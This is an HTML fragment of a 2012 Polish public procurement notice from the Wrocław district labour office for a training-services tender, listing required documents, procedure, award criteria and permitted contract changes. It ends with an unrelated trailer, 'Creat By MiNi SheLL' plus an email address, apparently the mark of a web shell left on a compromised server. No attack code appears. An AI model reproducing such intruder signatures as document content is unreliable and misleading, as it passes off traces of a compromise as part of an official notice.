<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony Formularz oferty zgodnie z załącznikiem nr 2 do SIWZ.
2 Program szkolenia przygotowany przez Wykonawcę zgodnie z § 75 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.) zgodnie z załącznikiem nr 3 do SIWZ.
3 Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.).
4  Oświadczenie dotyczące organizacji praktyk u pracodawców wg wzoru stanowiącego załącznik nr 11 do SIWZ.
5 Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać wskazanie ustanowionego pełnomocnika oraz zakres jego umocowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartych w umowie w przypadkach:
1) zmiany terminu szkolenia w przypadku wystąpienia okoliczności niezależnych od Zamawiającego lub Wykonawcy,
2) zmiany osób prowadzących zajęcia na szkoleniu oraz opiekunów uczestników praktyki. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon, lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób wskazanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach i doświadczeniu. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia. Zamawiający może żądać od Wykonawcy zmiany osób przewidzianych do realizacji szkolenia, jeżeli uzna, że osoby te nienależycie wykonują swoje obowiązki. W takiej sytuacji Zamawiający pisemnie przedstawi powody, dla których żąda zmiany osób realizujących zamówienie i wskaże termin, w jakim Wykonawca zobowiązany będzie wskazać nowe osoby spełniające wymogi Zamawiającego. Kwalifikacje i doświadczenie nowych osób muszą być co najmniej równe jak u osób zastępowanych,
3) zmiany w harmonogramie zajęć z przyczyn losowych, pod warunkiem zachowania terminu realizacji umowy, za zgodą Zamawiającego,
4) zmiany miejsc przeprowadzenia szkolenia, w tym miejsca organizacji praktyk u pracodawców. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia i praktyki. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycje miejsca szkolenia o co najmniej porównywalnych warunkach. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia. Zamawiający nie dopuszcza organizacji szkolenia poza terenem miasta Wrocław.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.wroclaw.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, I piętro, pok. 112.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 14:00, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, kancelaria (parter, pokój nr 04).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com